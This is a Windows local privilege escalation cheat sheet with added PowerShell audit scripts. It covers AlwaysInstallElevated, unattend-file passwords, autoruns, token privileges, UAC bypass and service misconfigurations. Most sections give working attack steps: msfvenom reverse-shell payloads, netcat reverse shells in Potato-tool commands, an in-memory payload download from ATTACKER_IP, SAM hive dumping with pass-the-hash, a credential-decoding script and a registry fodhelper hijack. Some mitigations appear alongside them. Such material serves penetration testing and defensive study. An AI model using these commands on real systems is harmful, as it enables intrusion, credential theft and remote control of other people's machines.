Windows Local Privilege Escalation
🛠️ Under Construction
Useful Tools
In the following table, some popular and useful tools for Windows local privilege escalation are presented:
| Name | Language | Author | Description |
|---|---|---|---|
| SharpUp | C# | @harmj0y | SharpUp is a C# port of various PowerUp functionality |
| PowerUp | PowerShell | @harmj0y | PowerUp aims to be a clearinghouse of common Windows privilege escalation |
| Privesc | PowerShell | enjoiz | Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation |
| Winpeas | C# | @hacktricks_live | Windows local Privilege Escalation Awesome Script |
| PrivescCheck | PowerShell | @itm4n | Privilege Escalation Enumeration Script for Windows |
AlwaysInstallElevated
Manual Enumeration
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Tool Enumeration
$ SharpUp.exe audit AlwaysInstallElevated
Exploitation
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f msi > backdoor.msi
execute on Windows:
$ msiexec /quiet /qn /i backdoor.msi
Mitigation
The policy only takes effect when AlwaysInstallElevated is 1 in both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER hives, which is why both keys are queried above; a single hive set to 1 is not exploitable. To mitigate it, set the value to 0 (or delete it) in both hives. On domain-joined hosts the value is pushed by Group Policy, so fix the policy object rather than only the local key, or it will be re-applied.
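Added example (not from the original page): a PowerShell check that reads both hives, treats a missing key as "not set" instead of the error `reg query` prints, and only reports the host as vulnerable when both values are 1. The remediation function applies the mitigation above and needs an elevated shell for the HKLM half. Function names are this example's own.

```powershell
# Added example, not from the original page.
$aieKeys = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevated {
    $state = @{}
    foreach ($hive in $aieKeys.Keys) {
        # SilentlyContinue: a missing key or value simply means the policy is not configured
        $v = Get-ItemProperty -Path $aieKeys[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($null -ne $v) { [int]$v.AlwaysInstallElevated } else { $null }
    }
    [pscustomobject]@{
        HKLM       = $state.HKLM
        HKCU       = $state.HKCU
        # Both hives must be 1; msiexec elevates only when the machine AND user policy agree
        Vulnerable = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Remediation: set the value to 0 wherever the key exists (HKLM requires an elevated shell)
    foreach ($path in $aieKeys.Values) {
        if (Test-Path $path) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$result = Get-AlwaysInstallElevated
$result
if ($result.Vulnerable) {
    Write-Host '[!] AlwaysInstallElevated is 1 in both hives: any MSI this user runs installs as NT AUTHORITY\SYSTEM'
}
```

Run `Get-AlwaysInstallElevated` from the low-privileged shell you are assessing; the HKCU half is read under that user's hive, which is the one msiexec will consult.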
Answer files (Unattend files)
Manual Enumeration
$ Write-Host `n; foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n
Tool Enumeration
$ SharpUp.exe audit UnattendedInstallFiles
Exploitation
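Added example (not from the original page): a PowerShell script that does the manual steps in one go for every XML answer-file location from the enumeration loop above (the `.inf` files are INI, not XML, and are left to `type`). It pulls every `Password` and `AdministratorPassword` element out of the XML, regardless of namespace, and decodes it. It relies on the documented Sysprep encoding: when `PlainText` is false, the value is the UTF-16LE password with the element name (`Password` or `AdministratorPassword`) appended, then Base64-encoded; that is why a plain `base64 -d` on Linux prints NUL bytes between the characters. The suffix is stripped when present. Function names are this example's own.

```powershell
# Added example, not from the original page.
# Assumption (Sysprep convention): obfuscated value = Base64( UTF-16LE( password + ElementName ) )
$answerFiles = @(
    'C:\Windows\Panther\unattend.xml',
    'C:\Windows\Panther\Unattend\unattend.xml',
    'C:\Windows\System32\Sysprep\unattend.xml',
    'C:\Windows\System32\Sysprep\sysprep.xml',
    'C:\Windows\System32\Sysprep\Panther\unattend.xml',
    'C:\Windows\unattend.xml',
    'C:\unattend.xml'
)

function ConvertFrom-UnattendPassword {
    param([string]$Value, [string]$ElementName, [bool]$PlainText)
    if ($PlainText -or [string]::IsNullOrEmpty($Value)) { return $Value }
    try {
        $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value))
    } catch {
        return "<not base64: $Value>"
    }
    # Windows appends the element name before encoding; strip it to recover the real password
    if ($decoded.EndsWith($ElementName)) {
        $decoded = $decoded.Substring(0, $decoded.Length - $ElementName.Length)
    }
    return $decoded
}

function Get-UnattendCredentials {
    param([string[]]$Paths = $answerFiles)
    foreach ($file in $Paths) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        try { [xml]$xml = Get-Content -LiteralPath $file -Raw -ErrorAction Stop }
        catch { Write-Warning "Cannot read or parse $file"; continue }

        # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace
        $nodes = $xml.SelectNodes('//*[local-name()="Password" or local-name()="AdministratorPassword"]')
        foreach ($node in $nodes) {
            $valueNode = $node.SelectSingleNode('*[local-name()="Value"]')
            $plainNode = $node.SelectSingleNode('*[local-name()="PlainText"]')
            # <Credentials><Password> (domain join) is a bare string with no <Value> child
            $raw     = if ($valueNode) { $valueNode.InnerText } else { $node.InnerText }
            $isPlain = (-not $valueNode) -or ($plainNode -and $plainNode.InnerText -eq 'true')

            # The account name sits beside the password: <Username> (AutoLogon/Credentials) or <Name> (LocalAccount)
            $parent   = $node.ParentNode
            $userNode = $parent.SelectSingleNode('*[local-name()="Username" or local-name()="Name"]')
            $user = if ($node.LocalName -eq 'AdministratorPassword') { 'Administrator' }
                    elseif ($userNode) { $userNode.InnerText } else { '?' }

            [pscustomobject]@{
                File     = $file
                Element  = "$($parent.LocalName)/$($node.LocalName)"
                User     = $user
                Password = ConvertFrom-UnattendPassword -Value $raw -ElementName $node.LocalName -PlainText $isPlain
            }
        }
    }
}

Get-UnattendCredentials | Format-Table -AutoSize
```

If a value decodes to `*SENSITIVE*DATA*DELETED*`, Sysprep has already scrubbed the file; that is not a decoding failure, and the next file in the list is the one worth reading.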
1- Read the content of the found answer file:
$ type C:\Windows\Panther\Unattend\Unattend.xml
2- Decode the Base64 password field (the decoded bytes are UTF-16LE with the element name appended, so expect NUL bytes between characters and a trailing "Password" when decoding on Linux):
$ echo "<base64 string>" | base64 -d
Leaked Credentials (GitHub Repository)
$ git log
$ git diff <commit-id-1> <commit-id-2>
$ git show
Leaked Credentials (PowerShell History)
$ type C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Mitigation
$ Clear-Content -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
Logon Autostart Execution (Registry Run Keys)
Manual Enumeration
$ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Tool Enumeration
$ SharpUp.exe audit RegistryAutoruns
Exploitation
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe
Rename the malicious executable (shell.exe) to ‘NCV_AMD64.exe’, the binary referenced by the writable autorun entry found during enumeration, and put it in place of the original.
Open a listener on your Kali machine.
Reboot the victim’s machine and log in as Administrator; the Run entry executes the replaced binary in the Administrator’s session.
Mitigation
$ reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<KeyName>" /f
Logon Autostart Execution (Startup Folder)
Manual Enumeration
$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Tool Enumeration
$ accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Exploitation
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe
Move the malicious executable to ‘C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup’.
Open a listener on your Kali machine.
Reboot the victim’s machine and log in as Administrator; everything in the all-users Startup folder runs in that session.
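Added example (not from the original page) that serves both autostart sections, Run keys and the Startup folder: it lists every value under the machine-wide Run/RunOnce keys, resolves the executable each one points at, and reports the targets (the binary, its directory, and the all-users Startup folder) on which the current user holds an Allow ACE with write rights. Only HKLM keys and the all-users folder are covered, because HKCU Run and the per-user Startup folder only run as the user who already owns them. The check reads ACLs and ignores Deny entries, so treat a hit as a lead to confirm with `icacls` or `accesschk`. The `.exe` token heuristic for unquoted command lines and the function names are this example's assumptions.

```powershell
# Added example, not from the original page.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Rights that let you replace or tamper with a target; Modify and FullControl contain these bits
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData  -bor
             [int][System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [int][System.Security.AccessControl.FileSystemRights]::Delete     -bor
             [int][System.Security.AccessControl.FileSystemRights]::WriteDacl  -bor
             [int][System.Security.AccessControl.FileSystemRights]::WriteOwner

function Get-MyWriteAces {
    # Allow ACEs on $Path that carry write rights for one of the caller's own SIDs (Deny ACEs ignored)
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned or untranslatable SID
        if ($mySids -contains $sid) {
            [pscustomobject]@{ Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Get-AutorunTargets {
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($k in $runKeys) {
        if (-not (Test-Path $k)) { continue }
        $key = Get-Item -Path $k
        foreach ($name in $key.GetValueNames()) {
            $cmd = [Environment]::ExpandEnvironmentVariables([string]$key.GetValue($name))
            # Executable = quoted path, else the first token ending in .exe (heuristic), else first word
            if ($cmd -match '^"([^"]+)"')      { $exe = $Matches[1] }
            elseif ($cmd -match '^(.+?\.exe)') { $exe = $Matches[1] }
            else                               { $exe = ($cmd -split ' ')[0] }
            if (-not $exe) { continue }
            # Both the binary and its directory matter: a writable directory allows rename-and-replace
            [pscustomobject]@{ Source = "$k\$name"; Target = $exe }
            [pscustomobject]@{ Source = "$k\$name"; Target = (Split-Path -Parent $exe) }
        }
    }
    # A writable all-users Startup folder is itself the finding: anything dropped there runs at every logon
    [pscustomobject]@{ Source = 'StartupFolder'; Target = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" }
}

function Find-WritableAutoruns {
    foreach ($t in Get-AutorunTargets) {
        foreach ($ace in Get-MyWriteAces -Path $t.Target) {
            [pscustomobject]@{ Source = $t.Source; Target = $t.Target; Principal = $ace.Principal; Rights = $ace.Rights }
        }
    }
}

Find-WritableAutoruns | Format-Table -AutoSize
```

A hit on a directory rather than the binary is the case the Run-key exploitation above relies on: you cannot overwrite the original file, but you can rename it away and drop your own executable under the expected name.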
Mitigation
$ takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y
$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q
SeBackupPrivilege
Enumeration
$ whoami /priv
$ SharpUp.exe audit TokenPrivileges
Exploitation
SeBackupPrivilege lets the holder read any file or registry hive regardless of its ACL, so the SAM and SYSTEM hives can be saved and the local hashes dumped offline:
$ mkdir C:\temp
$ reg save hklm\sam C:\temp\sam.hive
$ reg save hklm\system C:\temp\system.hive
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
$ evil-winrm -i <ip> -u "Administrator" -H "<hash>"
SeImpersonatePrivilege
Enumeration
$ whoami /priv
$ SharpUp.exe audit TokenPrivileges
Exploitation
$ PrintSpoofer64.exe -i -c cmd
Potato Family
JuicyPotato
JuicyPotatoNG
JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.16.48 9002"
PrintSpoofer
# -i interacts with the new process in the current console instead of spawning it detached
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
RoguePotato
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
# The victim always resolves the OXID on TCP/135 of the host given with -r, so the attacker side
# must listen on 135 and forward the connection back to RoguePotato's local listener (9999):
# On attacker redirector (listens on TCP/135 and forwards to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
# On victim, run RoguePotato with the local resolver on 9999 and -r pointing to the redirector IP
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
SharpEfsPotato
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
# read the output written by the SYSTEM process
type C:\temp\w.log
nt authority\system
EfsPotato
# output will be nt authority\system
EfsPotato.exe "whoami"
# If one pipe fails or EDR blocks it, try the other supported pipes:
EfsPotato <cmd> [pipe]
# pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
GodPotato
# Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
DCOMPotato
# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"
# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"
SigmaPotato
# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
[SigmaPotato]::Main("cmd /c whoami")
# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
CLSID Problems
# Oftentimes the default CLSID that JuicyPotato uses doesn't work; the per-OS lists are here:
https://ohpe.it/juicy-potato/CLSID/
Checking CLSIDs
# Download Join-Object.ps1 and load it
https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1
# download and execute
https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1
# When trying every CLSID, a change in the port number means that the CLSID worked
# Check the working CLSIDs using the parameter -c
https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat
Stored Credentials (Runas)
Enumeration
$ cmdkey /list
Exploitation
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > malicious.exe
on victim (the saved credential listed by cmdkey is used without prompting):
$ runas /savecred /user:WORKGROUP\Administrator "C:\Windows\Tasks\malicious.exe"
UAC Bypass
Enumeration
$ reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Tool Enumeration
$ SharpUp.exe audit
Exploitation
ℹ️ This case study leverages a UAC bypass that abuses the auto-elevating Fodhelper.exe application. It only applies when the current user is a member of Administrators but holds the filtered (medium-integrity) token, and when UAC is below the "Always notify" level, since at that level auto-elevation is not honoured.
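Added example (not from the original page): a PowerShell pre-check for the fodhelper bypass, plus the cleanup the steps below do not include. It reads the full UAC posture (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop) rather than EnableLUA alone, and uses `whoami /groups` to tell whether BUILTIN\Administrators is present as a "deny only" group, which is exactly the filtered-token state the bypass needs. The ConsentPromptBehaviorAdmin meanings are the documented policy values; function names are this example's own.

```powershell
# Added example, not from the original page.
function Get-UacPosture {
    $sys = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # Documented values of ConsentPromptBehaviorAdmin
    $levels = @{ 0 = 'Elevate without prompting'
                 1 = 'Prompt for credentials on the secure desktop'
                 2 = 'Prompt for consent on the secure desktop (Always notify: auto-elevation disabled)'
                 3 = 'Prompt for credentials'
                 4 = 'Prompt for consent'
                 5 = 'Prompt for consent for non-Windows binaries (default)' }
    $cpba = $sys.ConsentPromptBehaviorAdmin
    # whoami /groups exposes token attributes that .NET's WindowsIdentity.Groups hides (deny-only groups)
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $admin  = $groups | Where-Object SID -eq 'S-1-5-32-544'
    $label  = ($groups | Where-Object SID -like 'S-1-16-*').'Group Name'
    [pscustomobject]@{
        EnableLUA                  = $sys.EnableLUA
        ConsentPromptBehaviorAdmin = $cpba
        AdminPromptMeaning         = if ($null -ne $cpba) { $levels[[int]$cpba] } else { 'not set' }
        PromptOnSecureDesktop      = $sys.PromptOnSecureDesktop
        IntegrityLevel             = $label
        InAdministrators           = [bool]$admin
        AdminGroupDenyOnly         = [bool]($admin -and $admin.Attributes -match 'deny only')
        HijackKeyPresent           = Test-Path 'HKCU:\Software\Classes\ms-settings\shell\open\command'
    }
}

function Test-FodhelperCandidate {
    $p = Get-UacPosture
    # UAC off (EnableLUA=0) means admins already get a full token; Always notify (2) blocks auto-elevation;
    # a non-deny-only Administrators group means the shell is already elevated or the user is not an admin
    return ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -ne 2 -and $p.AdminGroupDenyOnly)
}

function Remove-FodhelperHijack {
    # Undo the HKCU\Software\Classes\ms-settings registration created by the exploitation steps
    if (Test-Path 'HKCU:\Software\Classes\ms-settings') {
        Remove-Item 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
    }
}

Get-UacPosture
if (Test-FodhelperCandidate) {
    Write-Host '[+] Filtered admin token and UAC below Always notify: fodhelper will auto-elevate'
} else {
    Write-Host '[-] Preconditions not met (not an admin, already elevated, UAC off, or Always notify)'
}
```

Run `Remove-FodhelperHijack` once the elevated shell is back, because the `ms-settings` handler you registered stays in the user's hive and will fire again for any program that opens that protocol.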
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > malicious.exe
on victim:
$ New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
$ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
$ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "powershell -exec bypass -c C:\<full_path>\<binary.exe>" -Force
$ C:\Windows\System32\fodhelper.exe
Unquoted Service Path
Enumeration
$ wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
$ sc qc "Vulnerable Service 1"
$ icacls "C:\Program Files\Vulnerable Service1"
Tool Enumeration
$ SharpUp.exe audit UnquotedServicePath
Exploitation
$ sc query "Vulnerable Service 1"
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service.exe
on victim:
$ iwr -Uri http://<ip>:<port>/Service.exe -Outfile "C:\Program Files\Vulnerable Service1\Service.exe"
$ sc stop "Vulnerable Service 1"
$ sc start "Vulnerable Service 1"
Weak Registry Permissions
Enumeration
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
Tool Enumeration
SharpUp.exe audit ModifiableServiceRegistryKeys
Exploitation
on attacker:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service4.exe
nc -lnvp 9001
on victim:
iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f
sc start "Vulnerable Service 4"
Mitigation
Automated script (PowerShell, run from an elevated shell):
# Define the registry key path
$regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
# Get the current ACL (Access Control List) for the registry key
$acl = Get-Acl -Path $regKey
# Specify the account whose access should be removed
$account = "BUILTIN\Users"
$accessRights = [System.Security.AccessControl.RegistryRights]::FullControl
# The rule must be an Allow rule: RemoveAccessRule matches on identity and access type,
# so a Deny rule here would match nothing and the ACL would be written back unchanged.
# RemoveAccessRuleAll drops every explicit Allow entry for the account whatever rights it carries.
$accessRule = New-Object System.Security.AccessControl.RegistryAccessRule($account, $accessRights, "Allow")
$acl.RemoveAccessRuleAll($accessRule)
# Inherited entries are not touched by this call; if the offending ACE is inherited from
# HKLM\SYSTEM\CurrentControlSet\Services, break inheritance on the key first.
# Set the modified ACL back to the registry key
Set-Acl -Path $regKey -AclObject $acl
Weak Service Binary Permissions
Enumeration
icacls "C:\Program Files\CustomSrv2\Service2.exe"
sc qc "Vulnerable Service 2"
Tool Enumeration
$ SharpUp.exe audit ModifiableServiceBinaries
Exploitation
Stop the service first: a running service keeps its image mapped, so the binary cannot be overwritten until it stops.
$ sc stop "Vulnerable Service 2"
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service2.exe
on victim:
$ iwr -Uri http://<ip>:<port>/Service2.exe -Outfile "C:\Program Files\CustomSrv2\Service2.exe"
$ sc start "Vulnerable Service 2"
Mitigation
icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users
(icacls /remove:g takes only the principal and strips all of its granted rights; a rights suffix such as :(M) is not valid syntax there.)
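Added example (not from the original page) covering the last three sections together: one PowerShell audit that checks every service for an unquoted ImagePath with spaces whose search-path candidates live in a directory you can write, a service binary you can write, and a service registry key you can write (so ImagePath can be repointed as above). Write access is tested by actually opening a handle under the current token rather than by reading ACLs. The candidate logic is the general case of the single lab service shown earlier: for `C:\Program Files\Vulnerable Service1\Service.exe` it tests `C:\Program.exe` and `C:\Program Files\Vulnerable.exe`, the files the service control manager would try before the real one. The `.exe` suffix heuristic for unquoted paths, the temporary probe file used to test directories, and the function names are this example's own assumptions.

```powershell
# Added example, not from the original page. Service names and paths come from the live system.

function Test-FileWritable {
    # 'yes' = opened for write; 'locked' = sharing violation (image mapped, e.g. running service); 'no' = access denied
    param([string]$Path)
    try {
        $fs = [System.IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite'); $fs.Close(); return 'yes'
    } catch [System.UnauthorizedAccessException] { return 'no' }
      catch [System.IO.IOException]              { return 'locked' }
      catch                                      { return 'no' }
}

function Test-DirectoryWritable {
    # Creates and removes a random probe file; any failure counts as not writable
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        $fs = [System.IO.File]::Create($probe); $fs.Close()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Get-ServiceExecutable {
    # Quoted paths are exact; for unquoted paths assume the binary ends in .exe (heuristic)
    param([string]$ImagePath)
    if ($ImagePath -match '^"([^"]+)"')      { return $Matches[1] }
    if ($ImagePath -match '^(.+?\.exe)')     { return $Matches[1] }
    return ($ImagePath -split ' ')[0]
}

function Get-UnquotedPathCandidates {
    # Files CreateProcess tries before the real one for an unquoted path with spaces:
    # "C:\Program Files\Vulnerable Service1\Service.exe" -> C:\Program.exe, C:\Program Files\Vulnerable.exe
    param([string]$Exe)
    $parts = $Exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Find-ServiceMisconfigurations {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExecutable $svc.PathName
        $findings = @()

        # 1. Unquoted path with spaces: can we plant one of the search candidates?
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            foreach ($cand in Get-UnquotedPathCandidates $exe) {
                $dir = Split-Path -Parent $cand
                if ($dir -and -not (Test-Path -LiteralPath $cand) -and (Test-DirectoryWritable $dir)) {
                    $findings += "UnquotedPath: can plant $cand"
                }
            }
        }

        # 2. Service binary writable by the current user (or only locked because the service is running)
        if (Test-Path -LiteralPath $exe -PathType Leaf) {
            switch (Test-FileWritable $exe) {
                'yes'    { $findings += "WritableBinary: $exe" }
                'locked' { $findings += "Binary locked (running?), verify ACL with icacls: $exe" }
            }
        }

        # 3. Service registry key writable: OpenSubKey(..., $true) throws when write access is denied
        try {
            $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SYSTEM\CurrentControlSet\Services\$($svc.Name)", $true)
            if ($key) { $key.Close(); $findings += "WritableRegistryKey: HKLM\SYSTEM\CurrentControlSet\Services\$($svc.Name)" }
        } catch { }

        foreach ($f in $findings) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; StartMode = $svc.StartMode; Finding = $f }
        }
    }
}

Find-ServiceMisconfigurations | Format-Table -AutoSize
```

The `RunsAs` and `StartMode` columns tell you what a hit is worth: a service running as LocalSystem that starts automatically gives SYSTEM on the next reboot even when you lack the right to restart it, whereas one running as a low-privileged virtual account is persistence rather than escalation.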